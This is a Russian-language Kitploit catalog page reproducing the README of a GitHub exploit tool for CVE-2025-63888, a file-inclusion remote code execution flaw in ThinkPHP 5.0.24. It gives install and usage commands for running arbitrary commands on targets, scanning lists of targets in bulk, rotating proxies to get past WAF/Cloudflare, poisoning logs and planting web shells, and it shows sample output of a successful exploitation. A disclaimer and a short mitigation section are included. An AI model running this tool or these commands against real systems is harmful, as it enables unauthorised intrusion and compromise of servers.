Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-63888-exploit — Инструмент для исследований безопасности для обнаружения и тестирования CVE-2025-63888 (уязвимость RCE File Inclusion в ThinkPHP 5.0.24) | Kitploit
Инструменты/GitHubGitHub/an5i/cve-2025-63888-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

Инструмент для исследований безопасности для обнаружения и тестирования CVE-2025-63888 (уязвимость RCE File Inclusion в ThinkPHP 5.0.24)

Репозиторий
10429 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-63888 ThinkPHP 5.0.24 Эксплойт удаленного выполнения кода через включение файлов

Инструмент для исследования безопасности, предназначенный для обнаружения и тестирования уязвимости CVE-2025-63888 в ThinkPHP 5.0.24, которая позволяет удаленно выполнять код через включение файлов.

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение.

📋 Обзор

CVE-2025-63888 — это критическая уязвимость удаленного выполнения кода в ThinkPHP 5.0.24. Уязвимость находится в функции read, расположенной в thinkphp/library/think/template/driver/File.php, что позволяет злоумышленникам выполнять произвольный код через атаки включения файлов путем манипуляции путем шаблона в функции view().

CVSS Score: 9.8 (Критический)
Затронутая версия: ThinkPHP 5.0.24 (точная версия) метод


Уязвимый файл:
thinkphp/library/think/template/driver/File.php

Уязвимая функция:
read()

🔍 Возможности

  • Автоматическое обнаружение ThinkPHP: Определяет установки и версии ThinkPHP
  • Тестирование уязвимости: Проверяет уязвимость включения файлов CVE-2025-63888
  • Обнаружение конечных точек: Автоматически находит уязвимые конечные точки
  • Эксплуатация включения файлов: Демонстрирует возможность включения файлов
  • Отравление лог-файлов: Пытается отравить лог-файлы для RCE
  • Создание веб-шеллов: Создает веб-шеллы через включение файлов
  • Выполнение команд: Выполняет произвольные команды (для авторизованного тестирования)
  • Поддержка многопоточности: Сканирование нескольких целей параллельно
  • Поддержка прокси: Обход ограничений WAF/Cloudflare
  • Экспорт в JSON: Подробные результаты в формате JSON

📦 Установка

Предварительные требования

  • Python 3.6 или выше
  • pip (менеджер пакетов Python)

Быстрая установка

root@kitploit:~
# Clone the repository
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# Install dependencies
pip install -r requirements.txt

# Make script executable (optional)
chmod +x cve_2025_63888_exploit.py

Альтернатива: прямая загрузка

root@kitploit:~
# Download the script
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# Install dependencies
pip install requests

🚀 Использование

Базовое использование

root@kitploit:~
# Single target
python3 cve_2025_63888_exploit.py -u http://target.com

# Execute custom command
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# Multiple targets from file
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# With threading for faster scanning
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# Verbose output for debugging
python3 cve_2025_63888_exploit.py -u http://target.com -v

Использование прокси

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# Multiple proxies from file
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

Параметры командной строки

root@kitploit:~
-u, --url          Целевой URL
-f, --file         Файл, содержащий целевые URL (по одному на строку)
-c, --command      Команда для выполнения (по умолчанию: id)
-t, --threads      Количество потоков (по умолчанию: 1)
-o, --output       Выходной файл (по умолчанию: uknf_results.json)
-v, --verbose      Включить подробное логирование
--proxy            URL прокси (например, http://127.0.0.1:8080)
--proxy-list       Файл, содержащий URL прокси (по одному на строку)

📊 Вывод

Скрипт генерирует JSON-файл с подробными результатами:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 Как это работает

  1. Фаза обнаружения: Сканирует индикаторы фреймворка ThinkPHP
  2. Определение версии: Пытается определить версию ThinkPHP (5.0.24)
  3. Тестирование уязвимости: Проверяет уязвимость включения файлов
  4. Обнаружение конечных точек: Находит уязвимые конечные точки с помощью функции view()
  5. Эксплуатация: Демонстрирует возможность RCE через включение файлов

🛡️ Смягчение

Если вы используете ThinkPHP 5.0.24:

  1. Немедленно обновитесь:

    • Обновитесь до ThinkPHP 5.0.25+ или более поздней версии
    • Или обновитесь до ThinkPHP 6.x/7.x
  2. Реализуйте проверку пути:

    • Добавьте строгую проверку пути в функцию view()
    • Блокируйте символы обхода каталогов (../, ..)
    • Ограничьте пути шаблонов разрешенными каталогами
  3. Исправления на уровне кода:

    • Проверяйте пути шаблонов перед обработкой
    • Используйте realpath(), чтобы убедиться, что файлы находятся в разрешенных каталогах
    • Внедрите белый список функций

📚 Ссылки

  • CVE: CVE-2025-63888
  • GitHub Gist: CVE-2025-63888 Подробности
  • Статья на Yuque: Подробный анализ
  • Руководство ThinkPHP: Официальная документация

📖 Примеры

Пример 1: Сканирование одной цели

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

Пример 2: Несколько целей с выводом

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Run scan
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

Пример 3: Выполнение пользовательской команды

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

Пример 4: Использование прокси

root@kitploit:~
# Single proxy
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# Multiple proxies from file
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 Участие

Вклад приветствуется! Пожалуйста, не стесняйтесь отправлять пул-реквесты.

  1. Форкните репозиторий
  2. Создайте ветку для своей функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте в ветку (git push origin feature/AmazingFeature)
  5. Откройте пул-реквест

🐛 Проблемы

Если вы столкнулись с какими-либо проблемами или у вас есть предложения, пожалуйста, создайте issue на GitHub.

📝 Лицензия

Этот проект лицензирован по лицензии MIT — подробнее см. в файле LICENSE.

⭐ История звезд

Если вы нашли этот инструмент полезным, пожалуйста, поставьте ему звезду на GitHub!

⚖️ Юридическая информация

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой. Пользователи несут ответственность за получение надлежащего разрешения перед тестированием любых систем.

🙏 Благодарности

  • Первоначальный репортер уязвимости: Master-0-0
  • Сообщество безопасности ThinkPHP
  • Исследователи безопасности, внесшие вклад в анализ уязвимости

💰 Пожертвования

Если вы нашли этот инструмент полезным и хотите поддержать проект:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Спасибо за вашу поддержку! 🙏

Скачать инструмент